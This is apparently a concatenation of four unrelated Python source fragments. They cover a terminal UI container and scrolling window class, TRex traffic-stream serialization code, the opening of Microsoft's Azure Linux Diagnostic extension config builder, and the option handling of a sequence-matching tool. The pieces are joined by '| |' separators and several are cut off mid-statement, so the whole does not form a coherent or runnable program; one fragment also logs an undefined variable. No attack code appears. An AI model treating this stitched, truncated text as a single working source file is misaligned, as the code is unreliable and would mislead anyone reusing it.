s = self.focused_item.focusable_index + 1 if self.focused_item else 0
dmsg('s={}', s)
if s >= len(self.focusable_items_):
if wrap_around: s = 0
dmsg('s={}', s)
if s >= len(self.focusable_items_):
self.focused_item = None
dmsg('abandon focus')
return False
self.focused_item = self.focusable_items_[s]
self.focused_item.window.focus(True)
return True
# container._size_to_weight_height()
def _size_to_weight_height (self, size):
if self.direction == container.HORIZONTAL: return (size, self.height)
elif self.direction == container.VERTICAL: return (self.width, size)
else: raise error('bad dir: {}', self.direction)
# container.on_resize()
def on_resize (self, width, height):
if self.direction == container.HORIZONTAL: size = width
elif self.direction == container.VERTICAL: size = height
else: raise error('bad dir: {}', self.direction)
self._forget_item_locations()
min_size = self._compute_min_size()
dmsg('{} resize({}x{}): min_size={} size={}',
self, width, height, min_size, size)
if size < min_size and self.focused_item:
self.focused_item.size = min(size, self.focused_item.max_size)
items_to_place = [item for item in self.items_ if not item.concealed]
items_to_place.sort(key = lambda item: item.max_size - item.min_size)
total_weight = self._compute_weight_of_unsized_items()
for item in items_to_place:
dmsg('{}: {!r} => iw={} tw={}', self, item, item.weight, total_weight)
item.size = saturate(round(size * item.weight / total_weight), item.min_size, item.max_size)
size -= item.size
total_weight -= item.weight
self._compute_position_of_items()
lp = 0
for item in self.items_:
if item.concealed: continue
wh = self._size_to_weight_height(item.size)
dmsg('{}: resizing {!r} to {}', self, item, wh)
item.window.resize(*wh)
rc = self._get_item_row_col(item)
lp = item.pos + item.size
#if lp < size: self.refresh()
return
# container.input_timeout()
def input_timeout (self):
self.on_input_timeout()
for item in self.items_:
item.window.input_timeout()
# container.refresh_strip()
def refresh_strip (self, row, col, width):
dmsg('{}.refresh_strip(row={}, col={}, width={})', self, row, col, width)
if self.is_vertical():
item, idx = self._locate_item_by_pos(row)
if item:
item.window.refresh(row - item.pos, col, 1, width)
return
elif self.is_horizontal():
item, idx = self._locate_item_by_pos(col)
end_col = col + width
while col < end_col and item:
w = min(item.size, width)
item.window.refresh(row, col - item.pos, 1, w)
col += item.size
width -= w
idx += 1
item = self.items_[idx] if idx < len(self.items_) else None
# if not covered 'til end fall in the default window refresh
if width:
window.refresh(self, row, col, 1, width)
return
# container.pre_key()
# Overload this if your container needs to process keys before sending them to children
def pre_key (self, key):
return False
# container.post_key()
# Overload this if your container needs to process keys unprocessed by its children
def post_key (self, key):
return False
# container.on_key()
def on_key (self, key):
if self.pre_key(key):
return True
if self.focused_item:
key_handled = self.focused_item.window.on_key(key)
else:
dmsg('{}: dropping {!r} due to unfocused item', self, msg)
key_handled = True
if not key_handled:
key_handled = self.post_key(key)
return key_handled
# class container - end
#* vcontainer ***************************************************************
def vcontainer (**b):
return container(direction = container.VERTICAL, **b)
#* hcontainer ***************************************************************
def hcontainer (**b):
return container(direction = container.HORIZONTAL, **b)
#* cc_window ****************************************************************
class cc_window (window):
'''
Cached-content window.
This window caches the content that needs displaying.
When refresh() or refresh_strip() is called it just
provides the relevant portion of the cache.
'''
# cc_window.__init__()
def __init__ (self,
wid = None,
init_content = None,
styles = 'default',
active_styles = None,
can_have_focus = False):
window.__init__(self,
wid = wid,
can_have_focus = can_have_focus,
styles = styles,
active_styles = active_styles)
self.content = []
self.top_row = 0
self.auto_scroll = True
if init_content: self.set_content(0, init_content)
# cc_window.general_out()
def general_out (self, text):
self.set_content(len(self.content), text)
# cc_window.set_content()
def set_content (self, row, text):
'''updates the cached content. No need to overload this!'''
l = text.splitlines()
while row > len(self.content):
self.content.append('')
self.content[row : row + len(l)] = l
if self.height > 0 and self.auto_scroll and len(self.content) > self.height:
self.top_row = len(self.content) - self.height
dmsg('got content:\n{}', '\n'.join([repr(x) for x in self.content]))
self.refresh()
# cc_window.scroll()
# If the window has a height then we can scroll its contents up and down
# while disabling the auto_scroll at the same time
def scroll (self, delta):
if self.height > 0:
tmp_top_row = self.top_row + delta
if tmp_top_row < 0 or len(self.content) <= self.height:
tmp_top_row = 0
if len(self.content) > self.height and tmp_top_row > (len(self.content) - self.height):
tmp_top_row = len(self.content) - self.height
self.auto_scroll = False
self.top_row = tmp_top_row
self.refresh()
# cc_window.auto_scroll_on()
# enable auto-scrolling capability
def auto_scroll_on (self):
if self.height > 0:
if len(self.content) <= self.height:
self.top_row = 0
else:
self.top_row = len(self.content) - self.height
self.auto_scroll = True
self.refresh()
# cc_window.refresh_strip()
def refresh_strip (self, row, col, width):
#dmsg('cc_win: refresh row={} col={} width={}', row, col, width)
logical_row = self.top_row + row
if logical_row >= 0 and logical_row < len(self.content):
txt = self.sfmt(self.content[logical_row])
else:
txt = ''
#dmsg('{}: cc_win: refresh_strip with {!r}', self, txt)
w = compute_styled_text_width(txt)
if w < self.width: txt += self.sfmt(' ' * (self.width - w))
self.put(row, 0, txt, clip_col = col, clip_width = width)
# cc_window.regenerate_content()
def regenerate_content (self):
'''
Overload this if reflowing text is needed
'''
pass
# cc_window.on_resize()
def on_resize (self, width, height):
self.regenerate_content()
# if | |
== None:
if not packet.is_default_src_mac():
int_mac_src_override_by_pkt = 1
else:
int_mac_src_override_by_pkt = int(mac_src_override_by_pkt);
if mac_dst_override_mode == None:
if not packet.is_default_dst_mac():
int_mac_dst_override_mode = STLStreamDstMAC_PKT
else:
int_mac_dst_override_mode = int(mac_dst_override_mode);
self.is_default_mac = not (int_mac_src_override_by_pkt or int_mac_dst_override_mode)
self.fields['flags'] = (int_mac_src_override_by_pkt&1) + ((int_mac_dst_override_mode&3)<<1) + (int(dummy_stream) << 3)
self.fields['action_count'] = action_count
# basic fields
self.fields['enabled'] = enabled
self.fields['self_start'] = self_start
self.fields['start_paused'] = start_paused
self.fields['isg'] = isg
self.fields['core_id'] = core_id
if random_seed !=0 :
self.fields['random_seed'] = random_seed # optional
# mode
self.fields['mode'] = mode.to_json()
self.mode_desc = str(mode)
# packet and VM
pkt_json = packet.to_json()
self.fields['packet'] = pkt_json['packet']
self.fields['vm'] = pkt_json['vm']
self.pkt = base64.b64decode(self.fields['packet']['binary'])
# this is heavy, calculate lazy
self.packet_desc = None
if not flow_stats:
self.fields['flow_stats'] = STLFlowStats.defaults()
else:
self.fields['flow_stats'] = flow_stats.to_json()
def __str__ (self):
s = "Stream Name: {0}\n".format(self.name)
s += "Stream Next: {0}\n".format(self.next)
s += "Stream JSON:\n{0}\n".format(json.dumps(self.fields, indent = 4, separators=(',', ': '), sort_keys = True))
return s
def get_id (self):
""" Get the stream id after resolution """
return self.id
def has_custom_mac_addr (self):
""" Return True if src or dst MAC were set as custom """
return not self.is_default_mac
def is_explicit_dst_mac(self):
return ((self.fields['flags'] >> 1) & 0x3) == STLStreamDstMAC_PKT
def get_name (self):
""" Get the stream name """
return self.name
def get_next (self):
""" Get next stream object """
return self.next
def has_flow_stats (self):
""" Return True if stream was configured with flow stats """
return self.fields['flow_stats']['enabled']
def get_pg_id (self):
""" Returns packet group ID if exists """
return self.fields['flow_stats'].get('stream_id')
def get_flow_stats_type (self):
""" Returns flow stats type if exists """
return self.fields['flow_stats'].get('rule_type')
def get_pkt (self):
""" Get packet as string """
return self.pkt
def get_pkt_len (self, count_crc = True):
""" Get packet number of bytes """
pkt_len = len(self.get_pkt())
if count_crc:
pkt_len += 4
return pkt_len
def is_dummy (self):
""" return true if stream is marked as dummy stream """
return ( (self.fields['flags'] & 0x8) == 0x8 )
def get_pkt_type (self):
""" Get packet description. Example: IP:UDP """
if self.is_dummy():
return '-'
elif self.packet_desc == None:
self.packet_desc = STLPktBuilder.pkt_layers_desc_from_buffer(self.get_pkt())
return self.packet_desc
def get_mode (self):
return 'delay' if self.is_dummy() else self.mode_desc
@staticmethod
def get_rate_from_field (rate_json):
""" Get rate from json """
t = rate_json['type']
v = rate_json['value']
if t == "pps":
return format_num(v, suffix = "pps")
elif t == "bps_L1":
return format_num(v, suffix = "bps (L1)")
elif t == "bps_L2":
return format_num(v, suffix = "bps (L2)")
elif t == "percentage":
return format_num(v, suffix = "%")
def get_rate (self):
return self.get_rate_from_field(self.fields['mode']['rate'])
def to_pkt_dump (self):
""" Print packet description from Scapy """
if self.name:
print("Stream Name: ",self.name)
scapy_b = self.scapy_pkt_builder;
if scapy_b and isinstance(scapy_b,STLPktBuilder):
scapy_b.to_pkt_dump()
else:
print("Nothing to dump")
# return True if FE variable is being written only to IP src or dst, to show its value as IP
@staticmethod
def __is_all_IP(vm_var_usage_list):
for offsets_tuple in vm_var_usage_list:
if type(offsets_tuple) is not tuple:
return False
if offsets_tuple[0] != 'IP' or offsets_tuple[2] not in ('src', 'dst'):
return False
return True
# replace offset number by user-friendly string 'IP.src' etc.
@staticmethod
def __fix_offset_by_name(pkt, inst, name):
if name in inst:
ret = pkt.get_field_by_offset(inst[name])
if ret:
if inst['type'] in ('fix_checksum_ipv4', 'fix_checksum_hw', 'fix_checksum_icmpv6'): # do not include field name
if ret[1] == 0: # layer index is redundant
inst[name] = "'%s'" % ret[0]
else:
inst[name] = "'%s:%s'" % ret[0:2]
else:
if ret[1] == 0:
inst[name] = "'%s.%s'" % (ret[0], ret[2])
else:
inst[name] = "'%s:%s.%s'" % ret[0:3]
# returns the Python code (text) to build this stream, inside the code it will be in variable "stream"
def to_code(self):
""" Convert to Python code as profile """
layer = Ether(self.pkt)
pkt = CTRexScapyPktUtl(layer)
vm_var_usage = {}
for inst in self.fields['vm']['instructions']:
if inst['type'] == 'trim_pkt_size':
fv_name = inst['name']
if fv_name in vm_var_usage:
vm_var_usage[fv_name].append('trim')
else:
vm_var_usage[fv_name] = ['trim']
if 'pkt_offset' in inst:
fv_name = inst.get('fv_name', inst.get('name'))
if fv_name in vm_var_usage:
vm_var_usage[fv_name].append(pkt.get_field_by_offset(inst['pkt_offset']))
else:
vm_var_usage[fv_name] = [pkt.get_field_by_offset(inst['pkt_offset'])]
vm_list = ['vm = STLVM()']
for inst in self.fields['vm']['instructions']:
inst = dict(inst)
#print inst
self.__fix_offset_by_name(pkt, inst, 'pkt_offset')
if 'is_big_endian' in inst:
inst['byte_order'] = "'big'" if inst['is_big_endian'] else "'little'"
if inst['type'] == 'flow_var':
value_list = inst.get('value_list')
if inst['name'] in vm_var_usage and inst['size'] == 4 and self.__is_all_IP(vm_var_usage[inst['name']]):
if value_list is not None:
inst['value_list'] = ['%s' % ltoa(val) for val in value_list]
else:
inst['init_value'] = "'%s'" % ltoa(inst['init_value'])
inst['min_value'] = "'%s'" % ltoa(inst['min_value'])
inst['max_value'] = "'%s'" % ltoa(inst['max_value'])
if inst['next_var']:
inst['next_var'] = "'%s'" % inst['next_var']
common_start = "vm.var(name='{name}', op='{op}', step={step}, size={size}, split_to_cores={split_to_cores}, next_var={next_var}, "
if value_list is not None:
vm_list.append((common_start + "min_value=None, max_value=None, value_list={value_list})").format(**inst))
else:
vm_list.append((common_start + "min_value={min_value}, max_value={max_value}, init_value={init_value})").format(**inst))
elif inst['type'] == 'write_flow_var':
vm_list.append("vm.write(fv_name='{name}', pkt_offset={pkt_offset}, add_val={add_value}, byte_order={byte_order})".format(**inst))
elif inst['type'] == 'write_mask_flow_var':
inst['mask'] = hex(inst['mask'])
vm_list.append("vm.write_mask(fv_name='{name}', pkt_offset={pkt_offset}, pkt_cast_size={pkt_cast_size}, mask={mask}, shift={shift}, add_val={add_value}, byte_order={byte_order})".format(**inst))
elif inst['type'] == 'fix_checksum_ipv4':
vm_list.append("vm.fix_chksum(offset={pkt_offset})".format(**inst))
elif inst['type'] == 'fix_checksum_hw':
inst['l3_offset'] = inst['l2_len']
inst['l4_offset'] = inst['l2_len'] + inst['l3_len']
self.__fix_offset_by_name(pkt, inst, 'l3_offset')
self.__fix_offset_by_name(pkt, inst, 'l4_offset')
vm_list.append("vm.fix_chksum_hw(l3_offset={l3_offset}, l4_offset={l4_offset}, l4_type={l4_type})".format(**inst))
elif inst['type'] == 'fix_checksum_icmpv6':
inst['l3_offset'] = inst['l2_len']
inst['l4_offset'] = inst['l2_len'] + inst['l3_len']
self.__fix_offset_by_name(pkt, inst, 'l3_offset')
self.__fix_offset_by_name(pkt, inst, 'l4_offset')
vm_list.append("vm.fix_chksum_icmpv6(l3_offset={l3_offset}, l4_offset={l4_offset})".format(**inst))
elif inst['type'] == 'trim_pkt_size':
vm_list.append("vm.trim(fv_name='{name}')".format(**inst))
elif inst['type'] == 'tuple_flow_var':
inst['ip_min'] = ltoa(inst['ip_min'])
inst['ip_max'] = ltoa(inst['ip_max'])
vm_list.append("vm.tuple_var(name='{name}', ip_min='{ip_min}', ip_max='{ip_max}', port_min={port_min}, port_max={port_max}, limit_flows={limit_flows}, flags={flags})".format(**inst))
elif inst['type'] == 'flow_var_rand_limit':
if inst['next_var']:
inst['next_var'] = "'%s'" % inst['next_var']
vm_list.append("vm.repeatable_random_var(fv_name='{name}', size={size}, limit={limit}, seed={seed}, min_value={min_value}, max_value={max_value}, split_to_cores={split_to_cores}, next_var={next_var})".format(**inst))
else:
raise TRexError('Got unhandled FE instruction type: %s' % inst['type'])
if 'cache' in self.fields['vm']:
vm_list.append('vm.set_cached(%s)' % self.fields['vm']['cache'])
vm_code = '\n'.join(vm_list)
stream_params_list = []
stream_params_list.append('packet = STLPktBuilder(pkt = packet, vm = vm)')
if default_STLStream.name != self.name:
stream_params_list.append('name = %s' % STLStream.__add_quotes(self.name))
if default_STLStream.fields['enabled'] != self.fields['enabled']:
stream_params_list.append('enabled = %s' % self.fields['enabled'])
if default_STLStream.fields['self_start'] != self.fields['self_start']:
stream_params_list.append('self_start = %s' % self.fields['self_start'])
if default_STLStream.fields['start_paused'] != self.fields['start_paused']:
stream_params_list.append('start_paused = %s' % self.fields['start_paused'])
if default_STLStream.fields['isg'] != self.fields['isg']:
stream_params_list.append('isg = %s' % self.fields['isg'])
if default_STLStream.fields['flow_stats'] != self.fields['flow_stats']:
if 'rule_type' in self.fields['flow_stats']:
stream_params_list.append('flow_stats = %s(%s)' % ('STLFlowStats' if self.fields['flow_stats']['rule_type'] == 'stats' else 'STLFlowLatencyStats', self.fields['flow_stats']['stream_id']))
if default_STLStream.next != self.next:
stream_params_list.append('next = %s' % STLStream.__add_quotes(self.next))
if default_STLStream.id != self.id:
stream_params_list.append('stream_id = %s' % self.id)
if default_STLStream.fields['action_count'] != self.fields['action_count']:
stream_params_list.append('action_count = %s' % self.fields['action_count'])
if 'random_seed' in self.fields:
stream_params_list.append('random_seed = %s' % self.fields.get('random_seed', 0))
if default_STLStream.fields['core_id'] != self.fields['core_id']:
stream_params_list.append('core_id = %s' % self.fields['core_id'])
stream_params_list.append('mac_src_override_by_pkt = %s' % bool(self.fields['flags'] & 1))
stream_params_list.append('mac_dst_override_mode = %s' % (self.fields['flags'] >> 1 & 3))
if self.is_dummy():
stream_params_list.append('dummy_stream = True')
mode_args = ''
for key, value in self.fields['mode'].items():
if key not in ('rate', 'type'):
mode_args += '%s = %s, ' % (key, value)
mode_args += '%s = %s' % (self.fields['mode']['rate']['type'], self.fields['mode']['rate']['value'])
if self.mode_desc == STLTXCont.__str__():
stream_params_list.append('mode = STLTXCont(%s)' % mode_args)
elif self.mode_desc == STLTXSingleBurst().__str__():
stream_params_list.append('mode = STLTXSingleBurst(%s)' % mode_args)
elif self.mode_desc == STLTXMultiBurst().__str__():
stream_params_list.append('mode = STLTXMultiBurst(%s)' % mode_args)
else:
raise TRexError('Could not determine mode: %s' % self.mode_desc)
stream = "stream = STLStream(" + ',\n '.join(stream_params_list) + ')'
layer.hide_defaults() # remove fields with default values
imports_arr = []
layers_commands = []
# remove checksums, add imports if needed
while layer:
layer_class = layer.__class__.__name__
if layer_class not in vars(scapy.layers.all): # custom import
found_import = False
for module_path, module in sys.modules.items():
if not module_path.startswith(('scapy.layers', 'scapy.contrib')):
continue
import_string = 'from %s import %s' % (module_path, layer_class)
if import_string in imports_arr: # already present in extra imports
found_import = True
break
if hasattr(module, layer_class): # add as extra import
imports_arr.append(import_string)
found_import = True
break
if not found_import:
raise TRexError('Could not determine import of layer %s' % layer.name)
payload = layer.payload
layer.remove_payload()
if isinstance(layer, Raw):
payload_data = bytes(layer)
if payload_data == payload_data[0:1] * len(payload_data): # compact form Raw('x' * 100) etc.
layer_command = '%s * %s)' % (Raw(payload_data[0:1]).command().rstrip(')'), len(payload_data))
else:
layer_command = layer.command()
layers_commands.append(layer_command)
else:
layers_commands.append(layer.command())
layer = payload
imports = '\n'.join(imports_arr)
packet_code = 'packet = (' + (' / \n ').join(layers_commands) + ')'
if imports:
return '\n'.join([imports, packet_code, vm_code, stream])
return '\n'.join([packet_code, vm_code, stream])
# add quoted for string, or leave as is if other type
@staticmethod
def __add_quotes(arg):
if type(arg) is str:
return "'%s'" % arg
return arg
# used to replace non-printable characters with hex
@staticmethod
def __replchars_to_hex(match):
return | |
<filename>Diagnostic/lad_config_all.py
#!/usr/bin/env python
#
# Azure Linux extension
#
# Linux Azure Diagnostic Extension (Current version is specified in manifest.xml)
# Copyright (c) Microsoft Corporation
# All rights reserved.
# MIT License
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the ""Software""), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
# Software.
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os
import traceback
import xml.etree.ElementTree as ET
import Providers.Builtin as BuiltIn
import Utils.ProviderUtil as ProvUtil
import Utils.LadDiagnosticUtil as LadUtil
import Utils.XmlUtil as XmlUtil
import Utils.mdsd_xml_templates as mxt
import telegraf_utils.telegraf_config_handler as telhandler
import metrics_ext_utils.metrics_constants as metrics_constants
import metrics_ext_utils.metrics_ext_handler as me_handler
from Utils.lad_exceptions import LadLoggingConfigException, LadPerfCfgConfigException
from Utils.lad_logging_config import LadLoggingConfig, copy_source_mdsdevent_eh_url_elems
from Utils.misc_helpers import get_storage_endpoints_with_account, escape_nonalphanumerics
class LadConfigAll:
"""
A class to generate configs for all 3 core components of LAD: mdsd, omsagent (fluentd), and syslog
(rsyslog or syslog-ng) based on LAD's JSON extension settings.
The mdsd XML config file generated will be /var/lib/waagent/Microsoft. ...-x.y.zzzz/xmlCfg.xml (hard-coded).
Other config files whose contents are generated by this class are as follows:
- /etc/opt/microsoft/omsagent/LAD/conf/omsagent.d/syslog.conf : fluentd's syslog source config
- /etc/opt/microsoft/omsagent/LAD/conf/omsagent.d/tail.conf : fluentd's tail source config (fileLogs)
- /etc/opt/microsoft/omsagent/LAD/conf/omsagent.d/z_out_mdsd.conf : fluentd's out_mdsd out plugin config
- /etc/rsyslog.conf or /etc/rsyslog.d/95-omsagent.conf: rsyslog config for LAD's syslog settings
The content should be appended to the corresponding file, not overwritten. After that, the file should be
processed so that the '%SYSLOG_PORT%' pattern is replaced with the assigned TCP port number.
- /etc/syslog-ng.conf: syslog-ng config for LAD's syslog settings. The content should be appended, not overwritten.
"""
_default_perf_cfgs = [
{"query": "SELECT PercentAvailableMemory, AvailableMemory, UsedMemory, PercentUsedSwap "
"FROM SCX_MemoryStatisticalInformation",
"table": "LinuxMemory"},
{"query": "SELECT PercentProcessorTime, PercentIOWaitTime, PercentIdleTime "
"FROM SCX_ProcessorStatisticalInformation WHERE Name='_TOTAL'",
"table": "LinuxCpu"},
{"query": "SELECT AverageWriteTime,AverageReadTime,ReadBytesPerSecond,WriteBytesPerSecond "
"FROM SCX_DiskDriveStatisticalInformation WHERE Name='_TOTAL'",
"table": "LinuxDisk"}
]
def __init__(self, ext_settings, ext_dir, waagent_dir, deployment_id,
fetch_uuid, encrypt_string, logger_log, logger_error):
"""
Constructor.
:param ext_settings: A LadExtSettings (in Utils/lad_ext_settings.py) obj wrapping the Json extension settings.
:param ext_dir: Extension directory (e.g., /var/lib/waagent/Microsoft.OSTCExtensions.LinuxDiagnostic-2.3.xxxx)
:param waagent_dir: WAAgent directory (e.g., /var/lib/waagent)
:param deployment_id: Deployment ID string (or None) that should be obtained & passed by the caller
from waagent's HostingEnvironmentCfg.xml.
:param fetch_uuid: A function which fetches the UUID for the VM
:param encrypt_string: A function which encrypts a string, given a cert_path
:param logger_log: Normal logging function (e.g., hutil.log) that takes only one param for the logged msg.
:param logger_error: Error logging function (e.g., hutil.error) that takes only one param for the logged msg.
"""
self._ext_settings = ext_settings
self._ext_dir = ext_dir
self._waagent_dir = waagent_dir
self._deployment_id = deployment_id
self._fetch_uuid = fetch_uuid
self._encrypt_secret = encrypt_string
self._logger_log = logger_log
self._logger_error = logger_error
self._telegraf_me_url = metrics_constants.lad_metrics_extension_influx_udp_url
self._telegraf_mdsd_url = metrics_constants.telegraf_influx_url
# Generated logging configs place holders
self._fluentd_syslog_src_config = None
self._fluentd_tail_src_config = None
self._fluentd_out_mdsd_config = None
self._rsyslog_config = None
self._syslog_ng_config = None
self._telegraf_config = None
self._telegraf_namespaces = None
self._mdsd_config_xml_tree = ET.ElementTree(ET.fromstring(mxt.entire_xml_cfg_tmpl))
self._sink_configs = LadUtil.SinkConfiguration()
self._sink_configs.insert_from_config(self._ext_settings.read_protected_config('sinksConfig'))
# Reading the AzMonSink info from the public config.
self._sink_configs_public = LadUtil.SinkConfiguration()
self._sink_configs_public.insert_from_config(self._ext_settings.read_public_config('sinksConfig'))
# If we decide to also read sinksConfig from ladCfg, do it first, so that private settings override
# Get encryption settings
handlerSettings = ext_settings.get_handler_settings()
if handlerSettings['protectedSettings'] is None:
errorMsg = "Settings did not contain protectedSettings. For information on protected settings, " \
"visit https://docs.microsoft.com/en-us/azure/virtual-machines/extensions/diagnostics-linux#protected-settings."
self._logger_error(errorMsg)
raise LadLoggingConfigException(errorMsg)
if handlerSettings['protectedSettingsCertThumbprint'] is None:
errorMsg = "Settings did not contain protectedSettingsCertThumbprint. For information on protected settings, " \
"visit https://docs.microsoft.com/en-us/azure/virtual-machines/extensions/diagnostics-linux#protected-settings."
self._logger_error(errorMsg)
raise LadLoggingConfigException(errorMsg)
thumbprint = handlerSettings['protectedSettingsCertThumbprint']
self._cert_path = os.path.join(waagent_dir, thumbprint + '.crt')
self._pkey_path = os.path.join(waagent_dir, thumbprint + '.prv')
def _ladCfg(self):
return self._ext_settings.read_public_config('ladCfg')
@staticmethod
def _wad_table_name(interval):
"""
Build the name and storetype of a metrics table based on the aggregation interval and presence/absence of sinks
:param str interval: String representation of aggregation interval
:return: table name
:rtype: str
"""
return 'WADMetrics{0}P10DV2S'.format(interval)
def _add_element_from_string(self, path, xml_string, add_only_once=True):
"""
Add an XML fragment to the mdsd config document in accordance with path
:param str path: Where to add the fragment
:param str xml_string: A string containing the XML element to add
:param bool add_only_once: Indicates whether to perform the addition only to the first match of the path.
"""
XmlUtil.addElement(xml=self._mdsd_config_xml_tree, path=path, el=ET.fromstring(xml_string),
addOnlyOnce=add_only_once)
def _add_element_from_element(self, path, xml_elem, add_only_once=True):
"""
Add an XML fragment to the mdsd config document in accordance with path
:param str path: Where to add the fragment
:param ElementTree xml_elem: An ElementTree object XML fragment that should be added to the path.
:param bool add_only_once: Indicates whether to perform the addition only to the first match of the path.
"""
XmlUtil.addElement(xml=self._mdsd_config_xml_tree, path=path, el=xml_elem, addOnlyOnce=add_only_once)
def _add_derived_event(self, interval, source, event_name, store_type, add_lad_query=False):
"""
Add a <DerivedEvent> element to the configuration
:param str interval: Interval at which this DerivedEvent should be run
:param str source: Local table from which this DerivedEvent should pull
:param str event_name: Destination table to which this DerivedEvent should push
:param str store_type: The storage type of the destination table, e.g. Local, Central, JsonBlob
:param bool add_lad_query: True if a <LadQuery> subelement should be added to this <DerivedEvent> element
"""
derived_event = mxt.derived_event.format(interval=interval, source=source, target=event_name, type=store_type)
element = ET.fromstring(derived_event)
if add_lad_query:
XmlUtil.addElement(element, ".", ET.fromstring(mxt.lad_query))
self._add_element_from_element('Events/DerivedEvents', element)
def _add_obo_field(self, name, value):
"""
Add an <OboDirectPartitionField> element to the <Management> element.
:param name: Name of the field
:param value: Value for the field
"""
self._add_element_from_string('Management', mxt.obo_field.format(name=name, value=value))
def _update_metric_collection_settings(self, ladCfg, namespaces):
"""
Update mdsd_config_xml_tree for Azure Portal metric collection. This method builds the necessary aggregation queries
that grind the ingested data and push it to the WADmetric table.
:param ladCfg: ladCfg object from extension config
:param namespaces: list of telegraf plugins sources obtained after parsing lad metrics config
:return: None
"""
# Aggregation is done by <LADQuery> within a <DerivedEvent>. If there are no alternate sinks, the DerivedQuery
# can send output directly to the WAD metrics table. If there *are* alternate sinks, have the LADQuery send
# output to a new local table, then arrange for additional derived queries to pull from that.
intervals = LadUtil.getAggregationPeriodsFromLadCfg(ladCfg)
sinks = LadUtil.getFeatureWideSinksFromLadCfg(ladCfg, 'performanceCounters')
for plugin in namespaces:
lad_specific_storage_plugin = "storage-" + plugin
for aggregation_interval in intervals:
if sinks:
local_table_name = ProvUtil.MakeUniqueEventName('aggregationLocal')
self._add_derived_event(aggregation_interval, lad_specific_storage_plugin,
local_table_name,
'Local', add_lad_query=True)
self._handle_alternate_sinks(aggregation_interval, sinks, local_table_name)
else:
self._add_derived_event(aggregation_interval, lad_specific_storage_plugin,
LadConfigAll._wad_table_name(aggregation_interval),
'Central', add_lad_query=True)
def _handle_alternate_sinks(self, interval, sinks, source):
"""
Update the XML config to accommodate alternate data sinks. Start by pumping the data from the local source to
the actual wad table; then run through the sinks and add annotations or additional DerivedEvents as needed.
:param str interval: Aggregation interval
:param [str] sinks: List of alternate destinations
:param str source: Name of local table from which data is to be pumped
:return:
"""
self._add_derived_event(interval, source, LadConfigAll._wad_table_name(interval), 'Central')
for name in sinks:
sink = self._sink_configs.get_sink_by_name(name)
if sink is None:
self._logger_log("Ignoring sink '{0}' for which no definition was found".format(name))
elif sink['type'] == 'EventHub':
if 'sasURL' in sink:
self._add_streaming_annotation(source, sink['sasURL'])
else:
self._logger_error("Ignoring EventHub sink '{0}': no 'sasURL' was supplied".format(name))
elif sink['type'] == 'JsonBlob':
self._add_derived_event(interval, source, name, 'JsonBlob')
else:
self._logger_log("Ignoring sink '{0}': unknown type '{1}'".format(name, sink['type']))
def _add_streaming_annotation(self, sink_name, sas_url):
"""
Helper to add an EventStreamingAnnotation element for the given sink_name and sas_url
:param str sink_name: Name of the EventHub sink name for the SAS URL
:param str sas_url: Raw SAS URL string for the EventHub sink
"""
self._add_element_from_string('EventStreamingAnnotations',
mxt.per_eh_url_tmpl.format(eh_name=sink_name,
key_path=self._pkey_path,
enc_eh_url=self._encrypt_secret_with_cert(sas_url)))
| |
maximum_number_of_outputs
if len(args_copy.output_description) == 1:
args_copy.output_description = args_copy.output_description * maximum_number_of_outputs
if not ( len(args_copy.output_id) == len(args_copy.output_seq) ==
len(args_copy.output_filter) == len(args_copy.output_description) ):
raise ValueError("The output IDs, seqs, descriptions, and "
"filters are of unequal sizes. Make them equal, or only "
"define one each and it will be reused across all."+
repr(( len(args_copy.output_id), len(args_copy.output_seq),
len(args_copy.output_filter), len(args_copy.output_description) )) )
i = 0
for idz, seqz, filterz, description in zip(args_copy.output_id, args_copy.output_seq, args_copy.output_filter, args_copy.output_description) :
this_name = 'untitled_output_'+str(i)
i += 1
try:
self.outputs_array.append( {
'name': this_name,
'filter': [ filterz, compile(filterz,'<string>','eval',optimize=2) ],
'id': [ idz, compile(idz,'<string>','eval',optimize=2) ],
'seq': [ seqz, compile(seqz,'<string>','eval',optimize=2) ] ,
'description':[ description, compile(description,'<string>','eval',optimize=2) ]
})
except Exception as error:
raise ValueError(repr(error)+" : "
"Either the supplied 'filter', 'id', 'seq', "
"or 'description' expression for a match group does "
"not look like a python expression - are all "
"non-group-name parts in quotes? Are group-names and "
"other parts connected with + signs?")
# Passing through the rest, defaults should be set in argparse defs
if args_copy.input is not None:
self.input = args_copy.input
if args_copy.input_format is not None:
self.input_format = args_copy.input_format
if args_copy.gzipped is not None:
self.gzipped = args_copy.gzipped
if args_copy.output is not None:
self.output = args_copy.output
if args_copy.output_format is not None:
self.output_format = args_copy.output_format
if args_copy.failed is not None:
self.failed = args_copy.failed
if args_copy.report is not None:
self.report = args_copy.report
def summary(self):
return_string = ('Configured as:'+
'\n input from: '+self.input+
'\n input format: '+self.input_format+
'\n is it gzipped?: '+str(self.gzipped)+
'\n output APPENDING to: '+self.output+
'\n output format is: '+self.output_format+
'\n failed being APPENDED to file: '+str(self.failed)+
'\n report being APPENDED to file: '+str(self.report)+
'\n with verbosity set at: '+str(self.verbosity)+
'\n doing these matches:')
for each in self.matches_array:
return_string += '\n - input: '+each['input']
return_string += '\n regex: '+str(each['regex'])
return_string += '\n writing these outputs:'
for each in self.outputs_array:
return_string += '\n - id: '+str(each['id'][0])
return_string += '\n description: '+str(each['description'][0])
return_string += '\n seq: '+str(each['seq'][0])
return_string += '\n filter: '+str(each['filter'][0])
return return_string
def reader(self):
"""This reads inputs, calls the `chop` method on each one, and sorts
it off to outputs. So this is called by the main function, and is
mostly about handling the I/O and handing it to the `chop` function.
Thus, this depends on the `Configuration` class being properly
configured with all the appropriate values.
"""
# Input
self.get_input_seqs()
# Outputs - passed records, failed records, report file
self.output_fh = self.open_output_fh(self.output)
self.report_fh = self.open_output_fh(self.report)
